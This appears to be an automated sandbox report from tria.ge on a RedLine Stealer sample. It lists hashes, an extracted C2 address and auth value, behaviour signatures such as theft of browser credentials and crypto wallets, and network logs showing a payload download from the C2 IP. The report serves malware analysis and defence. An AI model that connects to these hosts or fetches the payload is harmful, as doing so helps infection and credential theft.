Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    50s
  • max time network
    53s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    25/09/2022, 11:32 UTC

General

  • Target

    0bd647c00f31729fba742100e5c344b88f853ed6e96fde093a3102f28cc54d11.exe

  • Size

    361KB

  • MD5

    b6608633aed154db58c9430b6e4d26c5

  • SHA1

    9b9d0d7cb57b48b8e6db6c8fb292e5322f19dec9

  • SHA256

    0bd647c00f31729fba742100e5c344b88f853ed6e96fde093a3102f28cc54d11

  • SHA512

    58408b452f99eb74ab7443e8946e45f6bce62c57cef11de0e2fa9123b17d859dcf5edc8a3637d623e4f54790079cad6bf4baf86e9942649f4dc60e059af4e550

  • SSDEEP

    6144:eEaXBUcN2BRrn1fH0N6GkBut5adsSEK69yDPhSjYlakxjTLVqoARRSTZAPdg+:/aRDNoVJKRtUdsSEK69yDPhSjYlakxjv

Malware Config

Extracted

Family

redline

Botnet

0002

C2

13.72.81.58:13413

Attributes
  • auth_value

    866ce0ed8cfe2be77fb43a4912677698

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 5 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0bd647c00f31729fba742100e5c344b88f853ed6e96fde093a3102f28cc54d11.exe
    "C:\Users\Admin\AppData\Local\Temp\0bd647c00f31729fba742100e5c344b88f853ed6e96fde093a3102f28cc54d11.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:752
    • C:\Users\Admin\AppData\Local\Temp\build.exe
      "C:\Users\Admin\AppData\Local\Temp\build.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1944

Network

  • flag-us
    GET
    http://13.72.81.58:7766/build.exe
    0bd647c00f31729fba742100e5c344b88f853ed6e96fde093a3102f28cc54d11.exe
    Remote address:
    13.72.81.58:7766
    Request
    GET /build.exe HTTP/1.1
    Host: 13.72.81.58:7766
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Transfer-Encoding: chunked
    Server: Microsoft-HTTPAPI/2.0
    Date: Sun, 25 Sep 2022 11:32:35 GMT
  • 13.72.81.58:13413
    0bd647c00f31729fba742100e5c344b88f853ed6e96fde093a3102f28cc54d11.exe
    4.9MB
    74.8kB
    3366
    1692
  • 13.72.81.58:7766
    http://13.72.81.58:7766/build.exe
    http
    0bd647c00f31729fba742100e5c344b88f853ed6e96fde093a3102f28cc54d11.exe
    6.6kB
    383.4kB
    142
    277

    HTTP Request

    GET http://13.72.81.58:7766/build.exe

    HTTP Response

    200
  • 13.72.81.58:13413
    build.exe
    4.9MB
    74.5kB
    3360
    1696
No results found

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\build.exe

    Filesize

    362KB

    MD5

    37e39c732e3ec7e26743440e8986e2b0

    SHA1

    9637244713aeb6150e123b7d4472114c8bb0e4fa

    SHA256

    b5be007ac6b33d768841aa988ecb6efec133d1765b74bc9ccb516310b9c9ce7c

    SHA512

    7837285fee875c3572110a3ec3aad336f12f320e4d72607dd7d0f7c2669c0694daee7ecea0d4ffe1e36bca59783f0d0cd929f69d2107f567221e1e74d43f76eb

  • C:\Users\Admin\AppData\Local\Temp\build.exe

    Filesize

    362KB

    MD5

    37e39c732e3ec7e26743440e8986e2b0

    SHA1

    9637244713aeb6150e123b7d4472114c8bb0e4fa

    SHA256

    b5be007ac6b33d768841aa988ecb6efec133d1765b74bc9ccb516310b9c9ce7c

    SHA512

    7837285fee875c3572110a3ec3aad336f12f320e4d72607dd7d0f7c2669c0694daee7ecea0d4ffe1e36bca59783f0d0cd929f69d2107f567221e1e74d43f76eb

  • \Users\Admin\AppData\Local\Temp\build.exe

    Filesize

    362KB

    MD5

    37e39c732e3ec7e26743440e8986e2b0

    SHA1

    9637244713aeb6150e123b7d4472114c8bb0e4fa

    SHA256

    b5be007ac6b33d768841aa988ecb6efec133d1765b74bc9ccb516310b9c9ce7c

    SHA512

    7837285fee875c3572110a3ec3aad336f12f320e4d72607dd7d0f7c2669c0694daee7ecea0d4ffe1e36bca59783f0d0cd929f69d2107f567221e1e74d43f76eb

  • memory/752-54-0x0000000000800000-0x0000000000860000-memory.dmp

    Filesize

    384KB

  • memory/752-55-0x00000000003B0000-0x00000000003B6000-memory.dmp

    Filesize

    24KB

  • memory/752-56-0x0000000075841000-0x0000000075843000-memory.dmp

    Filesize

    8KB

  • memory/1944-61-0x0000000000CB0000-0x0000000000D10000-memory.dmp

    Filesize

    384KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.